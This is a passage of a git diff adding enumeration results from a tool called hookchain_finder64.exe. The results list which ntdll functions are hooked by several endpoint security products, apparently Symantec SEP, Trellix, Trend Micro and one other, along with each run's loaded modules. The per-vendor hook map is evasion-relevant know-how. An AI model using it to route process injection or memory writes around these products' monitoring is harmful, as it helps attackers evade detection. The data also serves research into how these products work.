+NtWriteVirtualMemory is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff7a3fc0000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ffa4b9d0000.
+C:\Windows\system32\hmpalert.dll is loaded at 0x00007ffa48e50000.
+C:\WINDOWS\System32\KERNEL32.dll is loaded at 0x00007ffa4a1f0000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ffa49360000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ffa46890000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ffa4a070000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+  +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/symantec_sep.txt b/enum/results_enum/symantec_sep.txt
new file mode 100644
index 0000000..70469e2
--- /dev/null
+++ b/enum/results_enum/symantec_sep.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtQuerySystemTime is hooked
+Mapped 456 functions
+ 
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hook\hookchain_finder64.exe is loaded at 0x00007ff7b4960000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ffecb420000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ffecb020000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ffec87a0000.
+C:\Windows\system32\apphelp.dll is loaded at 0x00007ffec5dc0000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ffecac60000.
+ 
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at KERNELBASE.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at apphelp.dll IAT
+  +-- 0 hooked functions.
+ 
+Checking ntdll.dll at msvcrt.dll IAT
+  +-- 0 hooked functions.
+ 
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/trellix.txt b/enum/results_enum/trellix.txt
new file mode 100644
index 0000000..4564ef5
--- /dev/null
+++ b/enum/results_enum/trellix.txt
@@ -0,0 +1,109 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtAlertResumeThread is hooked
+NtCreateThreadEx is hooked
+NtDuplicateToken is hooked
+NtGetContextThread is hooked
+NtMapViewOfSection is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtResumeThread is hooked
+NtSetContextThread is hooked
+NtUnmapViewOfSection is hooked
+NtWriteVirtualMemory is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff60b2d0000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ffb23190000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ffb211e0000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ffb20cf0000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ffb1e190000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ffb21750000.
+C:\Program Files\Common Files\McAfee\SystemCore\mfehcinj.dll is loaded at 0x00007ffaeb7a0000.
+C:\WINDOWS\System32\RPCRT4.dll is loaded at 0x00007ffb22dc0000.
+C:\WINDOWS\System32\ADVAPI32.dll is loaded at 0x00007ffb21c00000.
+C:\WINDOWS\System32\sechost.dll is loaded at 0x00007ffb212a0000.
+C:\WINDOWS\System32\bcrypt.dll is loaded at 0x00007ffb21160000.
+C:\WINDOWS\System32\WINTRUST.dll is loaded at 0x00007ffb20ff0000.
+C:\WINDOWS\System32\CRYPT32.dll is loaded at 0x00007ffb20ad0000.
+C:\WINDOWS\System32\ucrtbase.dll is loaded at 0x00007ffb21060000.
+C:\WINDOWS\SYSTEM32\MSASN1.dll is loaded at 0x00007ffb20350000.
+C:\Program Files\Common Files\McAfee\SystemCore\mfehcthe.dll is loaded at 0x00007ffaeb920000.
+C:\Program Files\McAfee\MAR\mvcairo_x64.dll is loaded at 0x00007ffaeb8a0000.
+C:\WINDOWS\System32\USER32.dll is loaded at 0x00007ffb213a0000.
+C:\WINDOWS\System32\win32u.dll is loaded at 0x00007ffb20cc0000.
+C:\WINDOWS\System32\GDI32.dll is loaded at 0x00007ffb221c0000.
+C:\WINDOWS\System32\gdi32full.dll is loaded at 0x00007ffb209b0000.
+C:\WINDOWS\System32\msvcp_win.dll is loaded at 0x00007ffb20860000.
+C:\WINDOWS\System32\ole32.dll is loaded at 0x00007ffb215f0000.
+C:\WINDOWS\System32\combase.dll is loaded at 0x00007ffb21870000.
+C:\WINDOWS\System32\OLEAUT32.dll is loaded at 0x00007ffb21fc0000.
+C:\WINDOWS\System32\IMM32.DLL is loaded at 0x00007ffb21bd0000.
+C:\Program Files\McAfee\Endpoint Security\Adaptive Threat Protection\mfedeeprem64.dll is loaded at 0x00007ffb1e0b0000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at mfehcinj.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at RPCRT4.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at ADVAPI32.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at sechost.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at bcrypt.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at WINTRUST.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at CRYPT32.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at MSASN1.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at mfehcthe.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at USER32.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at GDI32.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at gdi32full.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at ole32.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at combase.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at OLEAUT32.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at IMM32.DLL IAT
+  +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/trend.txt b/enum/results_enum/trend.txt
new file mode 100644
index 0000000..165045d
--- /dev/null
+++ b/enum/results_enum/trend.txt
@@ -0,0 +1,69 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtCreateMutant is hooked
+NtCreateThread is hooked
+NtCreateThreadEx is hooked
+NtGetContextThread is hooked
+NtLoadDriver is hooked
+NtMapViewOfSection is hooked
+NtProtectVirtualMemory is hooked
+NtQueryInformationThread is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtReadVirtualMemory is hooked
+NtSetContextThread is hooked
+NtSetInformationThread is hooked
+NtTerminateProcess is hooked
+NtUnmapViewOfSection is hooked
+NtUnmapViewOfSectionEx is hooked
+NtWriteVirtualMemory is hooked
+Mapped 491 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff649120000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ffb66ef0000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ffb65c20000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ffb64290000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ffb66bf0000.
+C:\Windows\system32\tmumh\20019\AddOn\8.55.0.1288\TmUmEvt64.dll is loaded at 0x00007ffb51ab0000.
+C:\Windows\System32\PSAPI.DLL is loaded at 0x00007ffb66ea0000.
+C:\Windows\System32\ADVAPI32.dll is loaded at 0x00007ffb66b20000.
+C:\Windows\System32\sechost.dll is loaded at 0x00007ffb64da0000.
+C:\Windows\System32\bcrypt.dll is loaded at 0x00007ffb64260000.
+C:\Windows\System32\RPCRT4.dll is loaded at 0x00007ffb65560000.
+C:\Windows\system32\tmumh\20019\TmMon\2.9.0.1084\tmmon64.dll is loaded at 0x0000000070ee0000.
+C:\Windows\System32\TmLWE\TmUmSnsr64\1.0.0.1127\TmUmSnsr64.dll is loaded at 0x00007ffb46f50000.
+C:\Windows\SYSTEM32\kernel.appcore.dll is loaded at 0x00007ffb63230000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at PSAPI.DLL IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at ADVAPI32.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at sechost.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at bcrypt.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at RPCRT4.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at kernel.appcore.dll IAT
+  +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file